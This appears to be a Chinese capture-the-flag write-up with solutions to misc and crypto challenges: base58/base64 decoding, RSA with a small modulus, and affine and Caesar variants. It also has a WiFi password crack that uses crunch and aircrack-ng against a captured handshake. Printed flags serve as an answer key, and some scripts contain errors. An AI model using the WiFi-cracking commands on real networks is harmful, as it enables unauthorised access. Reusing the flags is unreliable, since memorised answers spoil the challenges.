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
打开发现像是base64。但用base64解密失败。然后用base58解密成功
得到:
发现是图片经过base64加密后的值。然后进行还原。
得到二维码,扫描得到flag。
flag:jactf{base58_base64_flag_very_easy}
小梳子,我只爱你一个人
题目:
许心痕心中一直思念小梳子,所以他把wifi密码设置为她的手机号,前六位是138364,请破解出wifi密码,格式jactf{}
我们可以自己做一个字典,直接爆破就能得到。
我们可以使用kali的字典生成工具crunch来生成字典。命令是:
crunch 11 11 -t 138364%%%%% -o /root/桌面/test.txt
(解析:11代表字典最小和最大位都是11位,%代表数字,-o为输出路径)
然后字典就做好啦。
接着就是爆破了。
输入命令:
aircrack-ng -w /root/桌面/test.txt Tenda_D07D90-01.cap
输入对应的编号:12,然后就是开始爆破。
得到手机号。
所以flag为:jactf{13836458932}
Crypto部分
签到
6A616374667B6865785F69735F656173797D
16进制转字符串。
#coding:utf-8
import binascii
print binascii.a2b_hex("6A616374667B6865785F69735F656173797D")
得到flag。
贝斯家族三英战群魔!
有题目可知base(16+32+64)
看脚本:
#coding:utf-8
import base64
flag= "4A5A43554B4D4B524B524958555453554B55594643325353495648454B534A524A5656464551324F4B524554415432554B553245345643564746484549564C324A5A4B464B4D4352504A4954435453554E4D59453456434E5046475855574A524A5635464B36534F495256544354544B4B453245345243564742485649564A514A5A43554B4D4B4E4B524A45475453464955595534325352474A484549564A524A5656464B36534F49564D54415432554B555A453452434E4746484549554C594A5A4B464B4D4352504A4A45475453464A455955345643564756484549564C324A5A43464B364B4F49524954415453454B455A553452435A4742485549554A524A5A4347574D4B4F4E4A4A4549544C324A45594643564357494A48454B534A514A5A56464551324F4956495441544C324B56345534524B5647424956495553444A5A4B46434D434E504A4B54415453554A55595534564353495A48454B554A524A354B46434D4B4E504A495855544C4B4B5635453456434A4742484855554A534A5A43474F4D434F4E4A49544B5453554A55594643564356504248454B524A524A5A5645324D4B4F49524D54415453554B5634553456434E47424A47555553444A5A4B45534D434E4B524B54415453454955595534524356474248454B534A514B465646434D4B4E504A4554415453554A5559453456434A47424758555653434A5A4347474D434E4E4A4954495453554C45594536564356474A48454B524A524A5656464551534F4B56435441544C324B55595534524B4A47424A45495553444A5A43564B4D43524E4A4B585354534649555945345643524746484649554A524A5635464B4D534F49525654435453554B5532553452435A4742475855544C5A4A5A4B45324D4B4E4E4A49544754534649555945365243524746484549325A524A5A43464551534F4B52435441554C4B4B4A424534524B4A4742484755554A524A5A4B454B36534E4E4A4A454F5453454E4D595534325353494E484649554A514A5635464B4D434F49564554415453554B4A425534524B464742475755554A524A563546434D4B4E4E4A4A45475453464955594534365352474A4845495A5A514A5A4B46434E4B4F4B524B5441554C324B55325534524B4647464956495553444A5A4346534D43524E4A4A454B5453464A455946455643564F3548454B524A514B4656464B4D434F49524754435453454B5635453452435A4742495649554A524A5A4B47574D434F4B524754415453554C45594532365356474A484549595A524A5A5646434E434F49524B54415432554B555A4534524B4E504A4757555553434A5A4B554B4D434E504A4954455453464A46354534325353494E48454B574A514A354B464B4D534F49524B54435453454B463545345643564742495755564A524A5A4355534D434F4B524C45455453554B563545345243565046484549544A524B464B46434D324F49524554415432454B5559553452444C47464846495553434A5A4B45534D43524B524C45455453454A55594534365356474E48454B554A514B4656464552324F49564B5441554B554B4A4245345243564742485649564A514A5A43553236534E4E4A4A45455453454B55595536564352474A484549544A524A5A56464336534F4B525254415432554B4A4245345244484742484649554A564A5A4B46434D43524B524B58515453464955595643564356474A484549574A514A563545324D534F4B5247544155544B4B4532553456435A4742485649564A514A5A43454B4D4B4F49524A4549544C324A45594643325356474A475855564A514A5A4B45324D434F4B52455441554C4B4B4A4245345244444742484755554A544A5A4B47474D4B4F4B524B54435453464955595534325353494A48464B524A514B465646434D324F49564D54415553454B4A425534524B5647464755495553434A5A4355534D4B4F49524958515453554B45595532365356474648454B524A524A5A4B464B4E4B4F4B524B58555453454B555A453452434E4746475855554A564A5A43564B4D435049524954455453454E4D595534325353494A484649534A514B464B45324D4B4F495645544154544B4B4A425534524B5247424957555553474A5A4B45434D43524B5249544B5453554B455945323653564742484649554A514B4656464551324F49524D58555453554B4559553236535247464757555553444A5A4B46534D434F504A4958535453454D345945365243564746484649564A514B4635464D51534F4956435443554B554B4635453452444447424848555553464A5A4355534D4B4E495249544B5453554A455946433253564742484549544A524A5A43464B36534F4B524B5441554B554B5559553456444C4742484755554C324A5A4B46534D434E504A4B544554535549455945343253524752484549564A514B4656464B364B4F4956435443544C4B4B4A424534564B464746484755554A524A563545534D435349524A45475453464C45594536564356504648454B554A524A5A43464336434F4B524B5441554C324B4A425534524B4647464846495653434A5A43464B36534F49524B54455453454A55594645564352474E484549534A514B464B46434D324F4B524B54435453554B4A42453456435A47424956495653434A5A4355534D434F4E4A4B58555453464B455945323653564F3548454B534A524A5656464551324F4B52495441544B554B5559453456434E47424846495553434A5A4B464B4D4B504B524B5443544C324B45595534325352504A484649544A514A354B464552534F495254544154544B4B4532553456435A4742495649564C594A5A4355534D434F4E4A4B54455453454C45594532365353495648454B534A514B4A56464551324F4B524D5441544C324B5559453452434E4746484549564C324A5A4B464B4D43524B524B54435453554E4D59453456434E4742484649574A514A5635464D51534F4952525441544C4B4B453245345243564742485649564A524A5A43554B4D4B4F4B524A45455453564955594532365352474E484549595A514B4A43464336534F49564D54415553554B4A42453452444C4746484549554A564A5A4B46434D4B4E504A4954435453464A555945345643564756484549564C324A5A56464B4D534F495247544354544B4B455A5534524B464742485549554A524A5A4355534D4B4F49524A4549544C324A45594643564356474A484649574A514A5A5646434D4B4F4B52435443544C324B4A445534524B4A4746484755554C324A5A4B46434D434E4B524B54435453464A55594643325353494E484549564A524B464B46434D4B4E504A495443544C4B4B46354534524B564742484855554C5A4A5A43554B4D434F4B5249544B5453554B5559464336534E504648454B524A524B464B464336534F4B524D5443544C324B4A435534524B4A47424A4649554A564A5A4B45534D43524B524954435453454B55595534524356504A484549574A514A354B464B4D4B4F4B525654415453554A5559453456435A4742475855564C5A4A5A4347474D434F4E4A4954495453454C45594536564356474648454B524A524A5656464551534F4B524D58555453554B455A4534524B4A47424A45495553444A5A4356534D43504B524B54455453454D4D5955345243525042484649554A524A5635464B4D4B4F49564554435453554A56345534564356504A484549564C5A4A5A4345324D4B524B524954475453454A455945343653564752484649564A524A5A43464552434F4B56435441554B554B5A424534524B4A4742484649544C5A4A5A4356434D43524E4A4A454D5453464B555946435643524756484649554A514A5A35464B4D434F4B5247544154544B4B453255345643564746485649554A524A563546534D4B4E4E4A4958555453554A45594534365353494A4845495A5A514A5A4B46434E4B4E504A455443554B554B56345534524B464746495649554C324A5A4346534D434F4B524B58535453454A555946455643564F3548454B524A514A5A4B464B4D434F49524354435453554B4A42553456435647424957555653434A5A4345534D434F4B524754415453554A45594532365353495A484549595A514A565646434E434F49525254435453554B55595534524B4E504A4757555553434A5A4B554B4D434E504A4B54455453454A55594645524352504A48454B564A524A5643464551534F49564354415453554B4A4455345643524746475855554A524A5A43564B4D435349524B544B5453554B5635453232534E5046484649544A524A5A56464B35324F49524D54415432454B455A453452444C47464846495553434A5A4B454B4D43524B524B54455453464A45594534325353494E48454B554A514B4656464552324F495256544354544B4B455A55345643524742475649564A524A5A4355324D43524E4A4A454754534649555945323253564746475855554A524A5656464336534F4B524D54415454324B455A45345244484746484755554A564A5A4B46534D43524B524B5853545346495559553432534E4746484549564A524A563545324D534F4B5247544155544B4B4A444534524B464742495755564A554A5A4B464B4D4B4F49524B58555453554C455945365643564746484649325A514A5A4B45324D434E504A4D5443544C324B563455345244444742495649554A554A5A43464B4D43504B524C45455453564955595532564353494A48464B524A514B465646434D534F49524754415553554B4A425534524B5A4742495755564C5A4A5A4347574D4B4F49524958515453554B5559464336534E504648454B534A524B464B4643364B4F49524B58555453454B56345534524B4A4742484755554A544A5A4346534D435049524954455453454E4D595534325353494A484649574A514B464B464D51534F495247544154544B4B56354534524B5247424758555553474A5A4B45434D43524B524954475453554B455945345643564742484649544A524A5A4B464551534F4B524B54435432554B5559553236534A504A484755564C324A5A4B45534D434F504A4B54455453454D345945343253524756484649544A514B464B464B36434F49564358555453554B4635453452435A47424758555553464A5A4355534D43534E4A49544B5453554C455945345643564752484649564A524A5A4B464B36534F49524B5441554B554B5A42453452434E4746484649544C5A4A5A4356434D434E504A4B58535453454D3459553456434F4956475441554C324B4A434534524B4E4742495855555342485536513D3D3D3D"
while 1:
try:
flag= base64.b16decode(flag)
except:
print flag
break
try:
flag= base64.b32decode(flag)
except:
print flag
break
try:
flag= base64.b64decode(flag)
except:
printflag
break
由此可得flag:jactf{4(b64_32_16)}
罗马帝国的奠基者
这题是一个变异的凯撒密码。(和嘉伟思杯上的有个题差不多)
可以发现密文前五位字符h^_o`的ascii码为104 94 95 111 96
jactf的ascii码对应为:106 97 99 116 102。加密方式是第一个字符的ascii码减2,第二个字符的ascii码减3,第三个减4,那么依次减下去。
编写脚本:
str = "h^_o`[pZi^i`"
#106 97 99 116 102
#104 94 95 111 96 91 112 90 105 94 105 96 32 32 32 32 32
flag = ""
j=2
for i in range(len(str)):
flag += chr(ord(str[i])+j)
j = j+1
print flag
得到:jactfbxcsium
变成jactf{bxcsium}即为flag。
绝密情报
先进行base64得到;
[264032310L, 4950637341L, 4189137235L, 3503675906L, 1193272L, 374530968L, 5189281531L, 2514200272L, 4454305581L, 641078597L, 4395931659L, 2716426599L, 437539194L, 3448013596L, 307207209L, 4750820606L, 3250407993L, 853905209L, 2109791159L, 2716426599L, 2107899554L, 4395931659L, 2794384598L, 2109791159L, 5297779094L, 1460874286L, 1460874286L, 794931679L, 794931679L, 5447051622L, 853905209L, 3198340218L, 1193272L, 1912323101L, 5297779094L, 307207209L, 3231572608L, 3198340218L, 5189281531L, 527889548L, 4950637341L, 2839366805L, 1116457354L, 527889548L, 5297779094L, 3250407993L, 4454305581L, 6510392L, 3250407993L, 1460874286L, 1059035129L, 3200359612L, 853905209L, 307207209L, 156779101L, 2145301328L, 527889548L, 1059035129L, 5468025072L, 3448013596L, 2107899554L, 4189137235L, 3503675906L, 2653436113L]
进行rsa解密
#coding=utf-8
import rsa
import sys
import gmpy2
marr= [264032310L, 4950637341L, 4189137235L, 3503675906L, 1193272L, 374530968L, 5189281531L, 2514200272L, 4454305581L, 641078597L, 4395931659L, 2716426599L, 437539194L, 3448013596L, 307207209L, 4750820606L, 3250407993L, 853905209L, 2109791159L, 2716426599L, 2107899554L, 4395931659L, 2794384598L, 2109791159L, 5297779094L, 1460874286L, 1460874286L, 794931679L, 794931679L, 5447051622L, 853905209L, 3198340218L, 1193272L, 1912323101L, 5297779094L, 307207209L, 3231572608L, 3198340218L, 5189281531L, 527889548L, 4950637341L, 2839366805L, 1116457354L, 527889548L, 5297779094L, 3250407993L, 4454305581L, 6510392L, 3250407993L, 1460874286L, 1059035129L, 3200359612L, 853905209L, 307207209L, 156779101L, 2145301328L, 527889548L, 1059035129L, 5468025072L, 3448013596L, 2107899554L, 4189137235L, 3503675906L, 2653436113L]
p = 54163 #(分解后的整数p,q)
q = 101929
n = 5520780427
e = 134257
d = int(gmpy2.invert(e , (p-1) * (q-1)))
print d
#message='U2FsdGVkX1/8DKBmhvO87/SOLaawwxvAdHLB9AV62nC6LhXzhatpvBcg6tlK7Fs5'
#rsa加密
# for i in message:
# print(ord(i))
# print(pow(ord(i),e,n))
# marr.append(pow(ord(i),e,n))
# print(marr)
#rsa解密
result=""
for j in marr:
# print(j)
result+= chr(pow(j,d,n))
print(result)
print("success!!!")。
得到:
U2FsdGVkX1/8DKBmhvO87/SOLaawwxvAdHLB9AV62nC6LhXzhatpvBcg6tlK7Fs5
再进行des解密得到flag。
flag:jactf{So_easy_RSA_and_DES}
贝叶斯
首先,先对密码本进行base64解密得到明文空间。
再查看加密脚本根据“where= ((where * a) + b) mod x;”这一段代码看出是仿射密码。
直接写爆破脚本:
#include <iostream>
#include <cstring>
using namespace std;
int gcd(int m, int n);
int init_gcd(int m, int n);
int des_find(string p, int m);
#define PSIZE 65 //宏定义密码表大小
int main()
{
string P("zQWERTYUIOPxcvbnmasdfASDFGHJKLghjkl_qwZXCVBNMert{yuiop}0123498765"), M("gf9C{YQ34KHN3sOwhCz3RzH3CKj3Ndpm1Bt7"); //明文空间,与已知密文
string C; //存放解密明文
int i = 2; //求解所有互素的数
int a1; //存放逆元
for (i; i < PSIZE; i++)
{
if (gcd(i, PSIZE) == 1)
{ //说明此时的i与28互素
/***求解此时的i的逆元***/
a1 = init_gcd(i, PSIZE);
for (int j = 0; j < PSIZE; j++) //控制b的遍历
{
cout << "此时:a=" << i << " b=" << j << " a的逆元为:" << a1 << " \"";
for (int k = 0; k < M.length(); k++) { //每一个汉字站两个字节,所以要用两个数组空间来存
int where = des_find(P, M[k]); //匹配密文在明文空间的位置
where = ((where - j)*a1) % PSIZE;
if (where < 0) {
where += PSIZE;
}
cout << P[where];
}
cout << "\"" << endl;
}
}
}
return 0;
}
int gcd(int b, int a) //求互素
{
int temp;
if (a < b)//判断大小
{
temp = a;
a = b;
b = temp;
}
if (b == 0) return a;
else return gcd(b, a%b);//递归
}
int init_gcd(int m, int n) //扩展欧几里得算法
{
int i = 2;
for (i; i < 28; i++)
{
if ((m*i) % n == 1)
{
return i;
}
}
}
int des_find(string p, int m) //位置匹配函数
{
for (int i = 0; i < p.length(); i ++) {
//cout<<p[i]<<p[i+1]<<endl;
if (m == p[i]) {
return i;
}
}
}
得到flag:
不会奔跑的数字下滑线
先进行url解码再进行base16解码再进行base64解码。得到:
NEGXJ{48_ter_119_xsoirw_teww}
看着非常像flag
但就不是。它把flag字母的ascii码值加四处理啦。(通过NEGXJ和JACTF进行比较发现的)
所以写脚本:
#coding=utf-8
str='NEGXJ{48_ter_119_xsoirw_teww}'
flag=''
for x in str:
# print x
if x.isalpha():#判断是不是字母
flag+=chr(ord(x)-4)
else:
flag+=x
print flag
得到flag。
